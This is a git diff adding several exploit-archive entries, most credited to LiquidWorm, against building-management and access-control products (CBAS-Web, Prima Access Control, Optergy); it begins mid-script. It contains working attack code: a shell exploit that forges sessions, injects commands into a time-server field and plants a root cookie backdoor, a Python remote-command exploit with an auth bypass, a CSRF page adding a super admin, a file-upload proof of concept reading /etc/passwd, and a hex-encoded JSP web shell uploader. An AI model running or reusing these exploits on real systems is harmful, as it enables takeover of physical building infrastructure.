+   echo_red "Could not connect to ${VULN_HOST} :(" ;
+   exit
+fi
+echo_blue "We can connect to the server"
+
+# check already infected
+echo_green "Checking if already infected.."
+RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5`
+if [ "$RESULT" == "200" ] ; then
+   echo_blue "Target already seems to be infected"
+   SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
+   echo_blue "Username found: ${SPLOT_USERNAME}"
+   read -p "Try shell directly? (Y/N)" TEST
+   if [ "$TEST" == "Y" ] ; then
+      echo_green "Trying direct shell.."
+      run_remote_shell
+      exit
+    fi
+else
+   echo_blue "Target not yet infected.." ;
+fi
+
+
+
+# ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload
+# Used to create file with the contents of a valid session file
+# Session file required a timestamp from < 3600 seconds ago
+# And a valid (remote) IP address
+
+echo_green "Creating custom session file.."
+# binary session file
+SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
+SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s="
+# write session/backup file
+printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg
+# write IP
+MY_IP=`curl -s https://api.ipify.org`
+printf ${MY_IP} >> backup.upg
+printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg
+# replace timestamp
+python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null
+# upload session as backup file
+echo_green "Uploading custom session file.."
+curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi
+
+# check if session file works
+RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5`
+if [ "$RESULT" != "200" ] ; then
+   echo_red "Creating session file didn't seem to work :(" ;
+   exit
+fi
+echo_blue "Session file active!"
+
+
+
+# ========================= Vuln 3: Image upload allows any file contents
+# We use it to upload a shell script
+# It will be run as root on startup
+
+# get csrf token
+echo_green "Retrieving CSRF token.."
+CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft           = "(.*)"' | awk -F '"' '{print $2}'`
+echo_blue "CSRF_TOKEN: $CSRF_TOKEN"
+
+if [ -z "$CSRF_TOKEN" ]; then
+  echo_red "Could not get CSRF token :("
+  exit
+fi
+
+# prepare file
+# this will run as root
+echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi" > shell.jpg
+echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi' >> shell.jpg
+
+# upload file
+echo_green "Uploading file.."
+RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \
+  -F "csrft=$CSRF_TOKEN" \
+  -F "person=31337" \
+  -F "file=@shell.jpg" \
+  ${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"`
+echo_blue $RESULT
+
+if [[ ! "$RESULT" =~ "successfully" ]]; then
+  echo_red "Could not upload file :("
+  exit
+fi
+
+
+
+# ========================= Vuln 4: Config allows command injection
+# Length is limited
+# Also, no spaces allowed
+
+# change config
+# the file in the config file will be run as root at startup
+echo_green "Writing new config.."
+curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp" > /dev/null
+echo_blue "Wrote new config, restarting device"
+
+# restart device
+RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"`
+# this is supposed to get returned (device rebooting)
+if [[ "$RESULT" =~ "could not handle the request" ]]; then
+  echo_green "Looks good! Waiting for device to reboot.."
+  sleep 20
+  echo_blue "Executing: whoami.."
+  SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
+  echo_blue "Username found: ${SPLOT_USERNAME}"
+
+  # cleanup
+  echo_green "Cleaning up uploaded files.."
+  echo_green "Removing fake backup file.."
+  RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
+  echo_green "Removing shell script.."
+  RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
+  echo_green "Files removed"
+
+  # start shell
+  echo ""
+  echo_green "If that worked, you can now execute commands via your cookie"
+  echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi"
+  echo_green "Or type commands below ('quit' to quit)"
+  echo ""
+
+  run_remote_shell
+
+else
+    echo_red "Exploit failed :("
+fi
+
+exit
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47627.py b/exploits/hardware/webapps/47627.py
new file mode 100755
index 000000000..c128eea59
--- /dev/null
+++ b/exploits/hardware/webapps/47627.py
@@ -0,0 +1,157 @@
+# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : N/A
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+#!/usr/bin/env python
+
+'''
+  Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit
+  Affected versions: 19.0.0 and below
+    by Sipke Mellema, 2019
+
+
+  Uses two vulnerabilities for executing commands:
+    - An authorization bypass in the auth module (CVE-2019-10853)
+    - A code execution vulnerability in the json.php endpoint (CVE-2019-10854)
+  
+  Example usage: 
+  $ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php"
+      ------------==[CBAS Web v19 Remote Command Injection
+
+      [*] URL: http://192.168.1.250/
+      [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php
+      [*] Cookie is authenticated
+      [*] Creating Python payload..
+      [*] Sending Python payload..
+      [*] Server says:
+      <?php
+      // Base functions for database access
+      // Expects a number of constants to be set.  Set settings.php
+
+      // Only allow local access to the database for security purposes
+      if(defined('WINDOWS') && WINDOWS){
+          define('MYSQL_HOST', '192.168.1.2');
+          define('DB_USER', 'wauser');
+          define('DB_PASS', 'wapwstandard');
+          /*define('DB_USER', 'root');
+          define('DB_PASS', 'souper secrit');*/
+          ...
+
+'''
+
+import requests
+import sys
+import base64 as b
+import json
+
+
+def debug_print(msg, level=0):
+  if level == 0:
+    print "[*] %s" % msg
+  if level == 1:
+    print "[-] %s" % msg
+
+# Check parameters
+if len(sys.argv) < 3:
+  print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__
+  exit(0)
+
+print "------------==[CBAS Web v18 Remote Command Injection\n"
+
+# Set host, cookie and URL
+host = sys.argv[1]
+cookies = {'PHPSESSID': 'comparemetoasummersday'}
+url = "http://%s/" % host
+
+debug_print("URL: %s" % url)
+
+# Command to execute
+# Only use single quotes in cmd pls
+icmd = sys.argv[2]
+if '"' in icmd:
+  debug_print("Please don't use double quotes in your command string", level = 1)
+  exit(0)
+
+debug_print("Executing: %s" % icmd)
+
+# URL for performing auth bypass by setting the auth cookie flag to true
+auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test"
+# URL for removing auth flag from cookie (for clean-up)
+logout_sess_req = "cbas/index.php?m=auth&a=logout"
+# URL for command injection and session validity checking
+json_checks_req = "cbas/json.php"
+
+# Perform logout
+def do_logout():
+  requests.get(url + logout_sess_req, cookies = cookies)
+
+# Check if out cookie has the authentication flag
+def has_auth():
+  ret = requests.get(url + json_checks_req, cookies = cookies)
+  if ret.text == "Access Forbidden":
+    return False
+  return True
+
+# Set auth flag on cookie
+def set_auth():
+  requests.get(url + auth_bypass_req, cookies = cookies)
+
+# =======================================================
+
+# Perform auth bypass if not authenticated yet
+if not has_auth():
+  debug_print("Cookie not yet authenticated")
+  debug_print("Setting auth flag on cookie via auth bypass..")
+  set_auth()
+
+# Check if bypass failed
+if not has_auth():
+  debug_print("Was not able to perform authorization bypass :(")
+  debug_print("Exploit failed, quitting..", level = 1)
+  exit(0)
+
+else:
+  debug_print("Cookie is authenticated")
+  debug_print("Creating Python payload..")
+
+  # Payload has to be encoded because the server uses the following filtering in exectools.php:
+  #   $bad = array("..", "\\", "&", "|", ";", '/', '>', '<');
+  # So no slashes, etc. This means only two "'layers' of quotes"
+  
+  # Create python code exec code
+  cmd_python = 'import os; os.system("%s")' % icmd
+  # Convert to Python array
+  cmd_array_string = str([ord(x) for x in cmd_python])
+  # Create command injection string
+  p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string
+  # Base64 encode for p parameter
+  p_encoded = b.b64encode(p_unencoded)
+
+  # Execute command
+  debug_print("Sending Python payload..")
+  ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})
+
+  # Parse result
+  ret_parsed = json.loads(ret.text)
+  try:
+    metadata = ret_parsed["metadata"]
+    identifier = metadata["identifier"]
+
+    debug_print("Server says:")
+    print identifier
+
+  # JSON Parsing error
+  except:
+    debug_print("Error parsing result from server :(", level = 1)
+
+# Uncomment if you want the cookie to be removed after use
+# debug_print("Logging out")
+# do_logout()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47628.txt b/exploits/hardware/webapps/47628.txt
new file mode 100644
index 000000000..c42c9ef24
--- /dev/null
+++ b/exploits/hardware/webapps/47628.txt
@@ -0,0 +1,30 @@
+# Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10847
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+<!-- CSRF Add Super Admin -->
+<html>
+  <body>
+  <script>history.pushState('', 't00t', 'index.php')</script>
+    <form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST">
+      <input type="hidden" name="username_" value="Sooper" />
+      <input type="hidden" name="first" value="Mess" />
+      <input type="hidden" name="last" value="O'Bradovich" />
+      <input type="hidden" name="email" value="aa@bb.cc" />
+      <input type="hidden" name="password_" value="" />
+      <input type="hidden" name="notes" value="CSRFed" />
+      <input type="hidden" name="group_id" value="0" />
+      <input type="hidden" name="role" value="super" />
+      <input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47630.txt b/exploits/hardware/webapps/47630.txt
new file mode 100644
index 000000000..ea1380700
--- /dev/null
+++ b/exploits/hardware/webapps/47630.txt
@@ -0,0 +1,35 @@
+# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10848
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# Testing for non-valid user:
+
+POST /cbas/index.php?m=auth&a=login HTTP/1.1
+
+username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
+
+# Response for non-valid user:
+
+<!-- Failed login comments appear here -->
+<p class="alert-error">randomuser</p>
+
+========================================================================
+
+Testing for valid user:
+
+POST /cbas/index.php?m=auth&a=login HTTP/1.1
+
+username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
+
+# Response for valid user:
+
+<!-- Failed login comments appear here -->
+<p class="alert-error">Invalid username/password combination.  Please try again!</p>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47634.txt b/exploits/hardware/webapps/47634.txt
new file mode 100644
index 000000000..b269918ba
--- /dev/null
+++ b/exploits/hardware/webapps/47634.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.3.35
+# Tested on: NA
+# CVE : CVE-2019-9189
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Prima Access Control 2.3.35 Authenticated Stored XSS
+
+# PoC
+
+---
+
+POST /bin/sysfcgi.fx HTTP/1.1
+Host: 192.168.13.37
+Connection: keep-alive
+Content-Length: 572
+Origin: https://192.168.13.37
+Session-ID: 5682699
+User-Agent: Mozi-Mozi/44.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: text/html, */*; q=0.01
+Session-Pc: 2
+X-Requested-With: XMLHttpRequest
+Referer: https://192.168.13.37/app/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: G_ENABLED_IDPS=google
+
+<requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA;    with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA;        for line in f:&#xA;            f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests>
+
+Result:
+
+$ curl https://192.168.13.37/app/images/logos/testingus2.txt
+root:x:0:0:root:/home/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/false
+bin:x:2:2:bin:/bin:/bin/false
+sys:x:3:3:sys:/dev:/bin/false
+sync:x:4:100:sync:/bin:/bin/sync
+mail:x:8:8:mail:/var/spool/mail:/bin/false
+www-data:x:33:33:www-data:/var/www:/bin/false
+operator:x:37:37:Operator:/var:/bin/false
+nobody:x:99:99:nobody:/home:/bin/false
+python:x:1000:1000:python:/home/python:/bin/false
+admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
+uid=0(root) gid=0(root) groups=0(root),10(wheel)
+Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47636.txt b/exploits/hardware/webapps/47636.txt
new file mode 100644
index 000000000..7887013bc
--- /dev/null
+++ b/exploits/hardware/webapps/47636.txt
@@ -0,0 +1,174 @@
+# Title: Optergy 2.3.0a - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7274
+
+#!/usr/bin/env python
+# -*- coding: utf8 -*-
+#
+##########################################################################
+#
+# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
+# [+] Usage: optergy_rfm.py http://IP
+# [+] Example: optergy_rfm.py http://10.0.0.17
+#
+# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19
+# Enter username: podroom
+# Enter password: podroom
+#
+# Welcome to Optergy HTTP Shell!
+# You can navigate to: http://192.168.232.19/images/jox.jsp
+# Or you can continue using this 'shell'.
+# Type 'exit' for exit.
+#
+# root@192.168.232.19:~# id
+# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
+# root@192.168.232.19:~# sudo id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
+#
+# root@192.168.232.19:~# exit
+# Have a nice day!
+#
+##########################################################################
+
+import requests
+import sys,os,time,re
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+    print "[+] Usage: " + piton + " http://IP"
+    print "[+] Example: " + piton + " http://10.0.0.17\n"
+    sys.exit()
+
+the_user = raw_input("Enter username: ")
+the_pass = raw_input("Enter password: ")
+the_host = sys.argv[1]
+odi = requests.Session()
+
+the_url = the_host + "/ajax/AjaxLogin.html?login"
+the_headers = {"Accept"           : "*/*",
+               "X-Requested-With" : "XMLHttpRequest",
+               "User-Agent"       : "Noproblem/16.0",
+               "Content-Type"     : "application/x-www-form-urlencoded",
+               "Accept-Encoding"  : "gzip, deflate",
+               "Accept-Language"  : "en-US,en;q=0.9"}
+
+the_data = {"username" : the_user,
+            "password" : the_pass,
+            "token"    : ''}
+
+odi.post(the_url, headers = the_headers, data = the_data)
+
+the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64"
+           "\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d"
+           "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
+           "\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72"
+           "\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74"
+           "\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25"
+           "\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74"
+           "\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f"
+           "\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69"
+           "\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######"
+
+the_url = the_host + the_upl
+the_headers = {"Cache-Control"   : "max-age=0",
+               "Content-Type"    : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
+               "User-Agent"      : "Noproblem/16.0",
+               "Accept"          : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
+               "Accept-Encoding" : "gzip, deflate",
+               "Accept-Language" : "en-US,en;q=0.9"}
+
+the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d"
+            "\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50"
+            "\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"
+            "\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66"
+            "\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22"
+            "\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
+            "\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e"
+            "\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43"
+            "\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70"
+            "\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73"
+            "\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67"
+            "\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75"
+            "\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22"
+            "\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a"
+            "\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45"
+            "\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22"
+            "\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50"
+            "\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e"
+            "\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55"
+            "\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20"
+            "\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f"
+            "\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69"
+            "\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
+            "\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21"
+            "\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
+            "\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43"
+            "\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75"
+            "\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72"
+            "\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22"
+            "\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65"
+            "\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
+            "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63"
+            "\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
+            "\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20"
+            "\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72"
+            "\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75"
+            "\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20"
+            "\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61"
+            "\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75"
+            "\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20"
+            "\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
+            "\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74"
+            "\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29"
+            "\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67"
+            "\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64"
+            "\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20"
+            "\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20"
+            "\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
+            "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69"
+            "\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20"
+            "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73"
+            "\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65"
+            "\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+            "\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d"
+            "\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44"
+            "\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d"
+            "\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f"
+            "\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55"
+            "\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
+            "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72"
+            "\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70"
+            "\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d"
+            "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72"
+            "\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51"
+            "\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########"
+
+odi.post(the_url, headers = the_headers, data = the_data)
+
+print "\nWelcome to Optergy HTTP Shell!"
+print "You can navigate to: " + the_host + "/images/jox.jsp"
